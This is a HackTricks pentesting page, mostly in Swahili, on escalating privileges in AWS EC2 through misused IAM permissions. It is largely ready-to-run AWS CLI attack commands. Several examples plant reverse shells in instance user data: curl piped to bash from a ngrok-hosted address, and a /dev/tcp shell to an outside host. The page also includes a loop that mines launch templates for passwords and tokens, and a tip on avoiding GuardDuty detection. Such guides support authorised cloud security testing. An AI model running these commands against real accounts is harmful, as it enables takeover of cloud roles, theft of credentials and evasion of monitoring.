AWS - EC2 Privesc

Support HackTricks

EC2

Kwa maelezo zaidi kuhusu EC2 angalia:

AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum

iam:PassRole, ec2:RunInstances

Mshambuliaji anaweza kuunda na mfano akifunga jukumu la IAM na kisha kufikia mfano huo ili kuiba akidi za jukumu la IAM kutoka kwa kiunganishi cha metadata.

  • Fikia kupitia SSH

Kimbia mfano mpya ukitumia funguo za ssh zilizoundwa (--key-name) na kisha ssh ndani yake (ikiwa unataka kuunda mpya unaweza kuhitaji kuwa na ruhusa ec2:CreateKeyPair).

aws ec2 run-instances --image-id <img-id> --instance-type t2.micro \
--iam-instance-profile Name=<instance-profile-name> --key-name <ssh-key> \
--security-group-ids <sg-id>
  • Upatikanaji kupitia rev shell katika data ya mtumiaji

Unaweza kuendesha mfano mpya ukitumia data ya mtumiaji (--user-data) ambayo itakutumia rev shell. Huhitaji kubainisha kundi la usalama kwa njia hii.

echo '#!/bin/bash
curl https://reverse-shell.sh/4.tcp.ngrok.io:17031 | bash' > /tmp/rev.sh

aws ec2 run-instances --image-id <img-id> --instance-type t2.micro \
--iam-instance-profile Name=E<instance-profile-name> \
--count 1 \
--user-data "file:///tmp/rev.sh"

Be careful with GuradDuty if you use the credentials of the IAM role outside of the instance:

AWS - GuardDuty Enum

Potential Impact: Direct privesc to a any EC2 role attached to existing instance profiles.

Privesc to ECS

With this set of permissions you could also create an EC2 instance and register it inside an ECS cluster. This way, ECS services will be run in inside the EC2 instance where you have access and then you can penetrate those services (docker containers) and steal their ECS roles attached.

aws ec2 run-instances \
--image-id ami-07fde2ae86109a2af \
--instance-type t2.micro \
--iam-instance-profile <ECS_role> \
--count 1 --key-name pwned \
--user-data "file:///tmp/asd.sh"

# Make sure to use an ECS optimized AMI as it has everything installed for ECS already (amzn2-ami-ecs-hvm-2.0.20210520-x86_64-ebs)
# The EC2 instance profile needs basic ECS access
# The content of the user data is:
#!/bin/bash
echo ECS_CLUSTER=<cluster-name> >> /etc/ecs/ecs.config;echo ECS_BACKEND_HOST= >> /etc/ecs/ecs.config;

Ili kujifunza jinsi ya kulazimisha huduma za ECS kufanyika katika hii EC2 mpya angalia:

AWS - ECS Privesc

Ikiwa huwezi kuunda mfano mpya lakini una ruhusa ecs:RegisterContainerInstance unaweza kuwa na uwezo wa kujiandikisha mfano ndani ya klasta na kutekeleza shambulio lililozungumziwa.

Athari Zinazoweza Kutokea: Privesc moja kwa moja kwa majukumu ya ECS yaliyounganishwa na kazi.

iam:PassRole, iam:AddRoleToInstanceProfile

Kama ilivyo katika hali ya awali, mshambuliaji mwenye ruhusa hizi anaweza kubadilisha jukumu la IAM la mfano ulioathirika ili aweze kuiba akidi mpya. Kama profaili ya mfano inaweza kuwa na jukumu 1 tu, ikiwa profaili ya mfano tayari ina jukumu (hali ya kawaida), utahitaji pia iam:RemoveRoleFromInstanceProfile.

# Removing role from instance profile
aws iam remove-role-from-instance-profile --instance-profile-name <name> --role-name <name>

# Add role to instance profile
aws iam add-role-to-instance-profile --instance-profile-name <name> --role-name <name>

Ikiwa profaili ya mfano ina jukumu na mshambuliaji hawezi kuondoa hiyo, kuna njia nyingine. Anaweza kupata profaili ya mfano bila jukumu au kuunda mpya (iam:CreateInstanceProfile), kuongeza jukumu kwa hiyo profaili ya mfano (kama ilivyojadiliwa hapo awali), na kuunganisha profaili ya mfano iliyovunjika kwa mfano uliovunjika:

  • Ikiwa mfano hauna profaili yoyote ya mfano (ec2:AssociateIamInstanceProfile) *

aws ec2 associate-iam-instance-profile --iam-instance-profile Name=<value> --instance-id <value>

Madhara Yanayoweza Kutokea: Privesc moja kwa moja kwa jukumu tofauti la EC2 (unahitaji kuwa umepata udhibiti wa mfano wa AWS EC2 na ruhusa za ziada au hali maalum ya wasifu wa mfano).

iam:PassRole(( ec2:AssociateIamInstanceProfile& ec2:DisassociateIamInstanceProfile) || ec2:ReplaceIamInstanceProfileAssociation)

Kwa ruhusa hizi inawezekana kubadilisha wasifu wa mfano uliohusishwa na mfano hivyo ikiwa shambulio tayari lilikuwa na ufikiaji wa mfano atakuwa na uwezo wa kuiba hati za kuingia kwa majukumu zaidi ya wasifu wa mfano kwa kubadilisha ule uliohusishwa nao.

  • Ikiwa ina wasifu wa mfano, unaweza kuondoa wasifu wa mfano (ec2:DisassociateIamInstanceProfile) na kuunganisha hiyo *

aws ec2 describe-iam-instance-profile-associations --filters Name=instance-id,Values=i-0d36d47ba15d7b4da
aws ec2 disassociate-iam-instance-profile --association-id <value>
aws ec2 associate-iam-instance-profile --iam-instance-profile Name=<value> --instance-id <value>
  • au badilisha profaili ya mfano ya mfano ulioathirika (ec2:ReplaceIamInstanceProfileAssociation). *

```bash
aws ec2 replace-iam-instance-profile-association --iam-instance-profile Name=<value> --association-id <value>
```

Madhara Yanayoweza Kutokea: Privesc moja kwa moja kwa jukumu tofauti la EC2 (unahitaji kuwa umepata udhibiti wa mfano wa AWS EC2 na ruhusa za ziada au hali maalum ya wasifu wa mfano).

ec2:RequestSpotInstances,iam:PassRole

Mshambuliaji mwenye ruhusa ec2:RequestSpotInstancesnaiam:PassRole anaweza kuomba Spot Instance yenye Jukumu la EC2 lililounganishwa na rev shell katika data ya mtumiaji. Mara mfano unapokimbia, anaweza kuiba jukumu la IAM.

REV=$(printf '#!/bin/bash
curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash
' | base64)

aws ec2 request-spot-instances \
--instance-count 1 \
--launch-specification "{\"IamInstanceProfile\":{\"Name\":\"EC2-CloudWatch-Agent-Role\"}, \"InstanceType\": \"t2.micro\", \"UserData\":\"$REV\", \"ImageId\": \"ami-0c1bc246476a5572b\"}"

ec2:ModifyInstanceAttribute

Mshambuliaji mwenye ec2:ModifyInstanceAttribute anaweza kubadilisha sifa za instances. Miongoni mwao, anaweza kubadilisha data ya mtumiaji, ambayo ina maana kwamba anaweza kufanya instance ikimbie data isiyo na mpangilio. Hii inaweza kutumika kupata rev shell kwa instance ya EC2.

Kumbuka kwamba sifa zinaweza tu kubadilishwa wakati instance imezimwa, hivyo idhini ec2:StopInstances na ec2:StartInstances.

TEXT='Content-Type: multipart/mixed; boundary="//"
MIME-Version: 1.0

--//
Content-Type: text/cloud-config; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="cloud-config.txt"

#cloud-config
cloud_final_modules:
- [scripts-user, always]

--//
Content-Type: text/x-shellscript; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="userdata.txt"

#!/bin/bash
bash -i >& /dev/tcp/2.tcp.ngrok.io/14510 0>&1
--//'
TEXT_PATH="/tmp/text.b64.txt"

printf $TEXT | base64 > "$TEXT_PATH"

aws ec2 stop-instances --instance-ids $INSTANCE_ID

aws ec2 modify-instance-attribute \
--instance-id="$INSTANCE_ID" \
--attribute userData \
--value file://$TEXT_PATH

aws ec2 start-instances --instance-ids $INSTANCE_ID

Madhara Yanayoweza Kutokea: Privesc moja kwa moja kwa yoyote EC2 IAM Role iliyoambatanishwa na mfano ulioanzishwa.

ec2:CreateLaunchTemplateVersion,ec2:CreateLaunchTemplate,ec2:ModifyLaunchTemplate

Mshambuliaji mwenye ruhusa ec2:CreateLaunchTemplateVersion,ec2:CreateLaunchTemplatena ec2:ModifyLaunchTemplate anaweza kuunda toleo jipya la Template ya Uzinduzi lenye rev shell katika data ya mtumiaji na EC2 IAM Role yoyote juu yake, kubadilisha toleo la kawaida, na kikundi chochote cha Autoscaler kilichotumia hiyo Template ya Uzinduzi ambayo ime pangwa kutumia toleo jipya au toleo la kawaida itafanya kurejesha mifano ikitumia hiyo template na itatekeleza rev shell.

REV=$(printf '#!/bin/bash
curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash
' | base64)

aws ec2 create-launch-template-version \
--launch-template-name bad_template \
--launch-template-data "{\"ImageId\": \"ami-0c1bc246476a5572b\", \"InstanceType\": \"t3.micro\", \"IamInstanceProfile\": {\"Name\": \"ecsInstanceRole\"}, \"UserData\": \"$REV\"}"

aws ec2 modify-launch-template \
--launch-template-name bad_template \
--default-version 2

Madhara Yanayoweza Kutokea: Privesc moja kwa moja kwa jukumu tofauti la EC2.

autoscaling:CreateLaunchConfiguration, autoscaling:CreateAutoScalingGroup, iam:PassRole

Mshambuliaji mwenye ruhusa autoscaling:CreateLaunchConfiguration,autoscaling:CreateAutoScalingGroup,iam:PassRole anaweza kuunda Mkonfigu wa Uzinduzi na Jukumu la IAM na rev shell ndani ya data ya mtumiaji, kisha kuunda kundi la autoscaling kutoka kwa mkonfigu huo na kusubiri rev shell kuiba Jukumu la IAM.

aws --profile "$NON_PRIV_PROFILE_USER" autoscaling create-launch-configuration \
--launch-configuration-name bad_config \
--image-id ami-0c1bc246476a5572b \
--instance-type t3.micro \
--iam-instance-profile EC2-CloudWatch-Agent-Role \
--user-data "$REV"

aws --profile "$NON_PRIV_PROFILE_USER" autoscaling create-auto-scaling-group \
--auto-scaling-group-name bad_auto \
--min-size 1 --max-size 1 \
--launch-configuration-name bad_config \
--desired-capacity 1 \
--vpc-zone-identifier "subnet-e282f9b8"

Madhara Yanayoweza Kutokea: Privesc moja kwa moja kwa jukumu tofauti la EC2.

!autoscaling

Seti ya ruhusa ec2:CreateLaunchTemplate na autoscaling:CreateAutoScalingGroup hazitoshi kupandisha mamlaka kwa jukumu la IAM kwa sababu ili kuunganisha jukumu lililoainishwa katika Mipangilio ya Uzinduzi au katika Kigezo cha Uzinduzi unahitaji ruhusa iam:PassRole na ec2:RunInstances (ambayo ni privesc inayojulikana).

ec2-instance-connect:SendSSHPublicKey

Mshambuliaji mwenye ruhusa ec2-instance-connect:SendSSHPublicKey anaweza kuongeza ufunguo wa ssh kwa mtumiaji na kuutumia kuufikia (ikiwa ana ufikiaji wa ssh kwa mfano) au kupandisha mamlaka.

aws ec2-instance-connect send-ssh-public-key \
--instance-id "$INSTANCE_ID" \
--instance-os-user "ec2-user" \
--ssh-public-key "file://$PUBK_PATH"

Madhara Yanayoweza Kutokea: Privesc moja kwa moja kwa majukumu ya EC2 IAM yaliyounganishwa na mifano inayotembea.

ec2-instance-connect:SendSerialConsoleSSHPublicKey

Mshambuliaji mwenye ruhusa ec2-instance-connect:SendSerialConsoleSSHPublicKey anaweza kuongeza ufunguo wa ssh kwenye muunganisho wa serial. Ikiwa serial haijawashwa, mshambuliaji anahitaji ruhusa ec2:EnableSerialConsoleAccess ili kuiwasha.

Ili kuungana na bandari ya serial unahitaji pia kujua jina la mtumiaji na nenosiri la mtumiaji ndani ya mashine.

aws ec2 enable-serial-console-access

aws ec2-instance-connect send-serial-console-ssh-public-key \
--instance-id "$INSTANCE_ID" \
--serial-port 0 \
--region "eu-west-1" \
--ssh-public-key "file://$PUBK_PATH"

ssh -i /tmp/priv $INSTANCE_ID.port0@serial-console.ec2-instance-connect.eu-west-1.aws

Njia hii si ya manufaa sana kwa privesc kwani unahitaji kujua jina la mtumiaji na nenosiri ili kuweza kuitumia.

Madhara Yanayoweza Kutokea: (Siyo rahisi kuthibitisha) Privesc moja kwa moja kwa EC2 IAM roles zilizounganishwa na mifano inayotumika.

describe-launch-templates,describe-launch-template-versions

Kwa kuwa templates za uzinduzi zina toleo, mshambuliaji mwenye ruhusa ec2:describe-launch-templates na ec2:describe-launch-template-versions anaweza kuzitumia hizi kugundua taarifa nyeti, kama vile akidi zilizopo katika data ya mtumiaji. Ili kufanikisha hili, skripti ifuatayo inarudiarudia kupitia matoleo yote ya templates za uzinduzi zinazopatikana:

for i in $(aws ec2 describe-launch-templates --region us-east-1 | jq -r '.LaunchTemplates[].LaunchTemplateId')
do
echo "[*] Analyzing $i"
aws ec2 describe-launch-template-versions --launch-template-id $i --region us-east-1 | jq -r '.LaunchTemplateVersions[] | "\(.VersionNumber) \(.LaunchTemplateData.UserData)"' | while read version userdata
do
echo "VersionNumber: $version"
echo "$userdata" | base64 -d
echo
done | grep -iE "aws_|password|token|api"
done

Katika amri zilizo hapo juu, ingawa tunabainisha mifumo fulani (aws_|password|token|api), unaweza kutumia regex tofauti kutafuta aina nyingine za taarifa nyeti.

Kukisia tunapata aws_access_key_id na aws_secret_access_key, tunaweza kutumia akreditivu hizi kuthibitisha kwa AWS.

Athari Zinazoweza Kutokea: Kuongezeka kwa haki moja kwa moja kwa mtumiaji wa IAM.

Marejeleo

Support HackTricks

Last updated